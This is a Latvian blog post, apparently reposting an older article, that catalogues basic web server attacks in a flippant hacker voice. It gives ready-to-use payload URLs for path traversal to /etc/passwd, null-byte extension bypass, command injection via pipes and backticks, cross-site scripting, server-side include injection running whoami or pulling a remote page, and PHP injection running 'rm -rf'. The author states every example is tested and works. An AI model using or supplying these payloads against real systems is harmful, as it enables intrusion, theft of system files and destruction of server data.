ziloniits ([info]ziloniits) rakstīja,
@ 2006-03-23 11:10:00

Previous Entry  Add to memories!  Tell a Friend!  Next Entry
Te nedaudz info kaa kairnaat parastos web serverus


"`" Pieprasījums Izplatītākie uzbrukuma veidi web serverim. [1851/2176]

komenti (26)

 

 [m|sc]  [http://misc.valsts.lv/]

 [13 mar. 2002, 13:35]

 

    Daži prikoli, ko bieži vien izmanto, lai uzlauztu web serveri. Tā kā admiņi lasiet lēnām un uzmanīgi un centieties arī kaut ko atcerēties ;)

 

"." ".." "..." Pieprasījumi

Šie pieprasījumi ir standarts, ko zina visi, kas interesējas par security. Gļuki sastopami ne tikai web serveros, bet arī daudzās ar tīklu saistītās tā saucamajās p2p programmās. Variējot ar . un / skaitu var panākt sev vēlamā faila, vai direktorijas nolistošanu.

 

piem:

http://zumm.lv/../../../etc/passwd

http://zumm.lv/cgi-bin/kewl.cgi?file=../../../../etc/motd

http://zumm.lv/\../fuk.file

u.t.t.

 

"%00" Pieprasījums

Hex`ā nozīme neko ;) (null byte). Tiek izmantots, lai apkāstu skriptus, u.t.t. Izmantojot šo nulles baitu var panākt, lai skripts, proga, vai velns zin kas domātu ka tiek pieprasīts savādākas extensijas fails, piem:

http://zumm.lv/cgi-bin/kewl.cgi?page=suck.html - šeit tiek pieprasīts fails suck.html, kuru ir atļauts aplūkot ;)

http://host/cgi-bin/lame.cgi?page=../../../../etc/passwd%00html - šeit tiek pieprasīts fails /etc/passwd.html un ir liela iespējamība to arī aplūkot ;]

 

"%20" Pieprasīšana

%20 hex`ā nozīmā tukšumu (space). Arī diezgan plaši tiek izmantots kā no hakeru, tā programmētāju puses, jo daudzas programmas izmanto hex, parastā texta vietā, lai izdarītu kādu pieprasījumu, vai atbildētu.

piem:

http://zumm.lv/cgi-bin/kewl.cgi?page=ls%20-al|

 

"|" Pieprasījums

Šis simbols tiek izmantots, lai varētu dot vairākas komandas pēc kārtas piem #ps - auxe| grep root. Tie kas dzīvo dos mkdir azis| rmdir azis ;)

http://zumm.lv/cgi-bin/kewl.cgi?page=../../../../bin/ls| - pieprasa palaist ls

http://zumm.lv/cgi-bin/kewl.cgi?page=../../../../bin/ls%20-al%20/etc| nolisto /etc direktoriju

http://zumm.lv/cgi-bin/kewl.cgi?page=cat%20/etc/passwd|grep%20sex meklē failā passwd vārdu sex

 

 

Bieži tiek izmantots Perl skriptos, lai palaistu komandas. Normāli gan tas netiek izmantots, taču ļaunajiem hax0riem nekas nav šķērslis ;)

piem:

http://zumm.lv/shit.cgi=`ls`

 

"<" ">" Pieprasīšana

Nesen tika sacelts liels troksnis, ap t.s. cross site eksploitiem ;) ja tā tos var saukt ;) Neko nopietnu gan nevar iesākt, taču var pačakarēt citiem cilvēkiem smadzenes, šutot falšus cookies, metot linkus u.t.t.

piem:

http://zumm.lv/shit.php=fuck%20you%20all

 

";" Pieprasīšana

Ļoti bieži izmantots visādos skriptos, bet ļoti reti filtrēts ;) Kautkas līdzīgs | pieprašijuma.

Piemēri: paskaties apkārt ;)

 

"!" Pieprasījums

Bieži tiek izmantots, lai īstenotu uzbrukumu uz SSI (Server Side Includes) bāzes. Istenojams tā pat kā <> pieprasījums ( cross site gļuks )

piem:

http://zumm.lv/shit.php=<!%20--#include%20virtual="http://misc.yo.lv/fuck.html"-->

http://zumm.lv/shit.php=<!%20--#exec%20cmd="whoami"--> - palaiž whoami

 

"<?" Pieprasījums

Bieži tiek izmantots, lai varētu iebāzt php skriptu no remote (attālināta ;] ) datora

http://zumm.lv/shit.php=<? passthru("rm%20-rf");?> - ja php security uz web servera nav normālā līmenī, tad var atvadīties bo tā ;))

 

P.S

Šie ir tikai paši primitīvākie uzbrukuma veidi. Par saražģītākajiem raksts būs drusku vēlāk. Nav laika visu laiku sēdēt pie kompja ;)

 

P.S.S

Visus šos piemērus esmu pats testējis, tā kā tie strādā uz pareizi "konfigurēta" servera ;))




(Ierakstīt jaunu komentāru)

Neesi iežurnalējies. Iežurnalēties?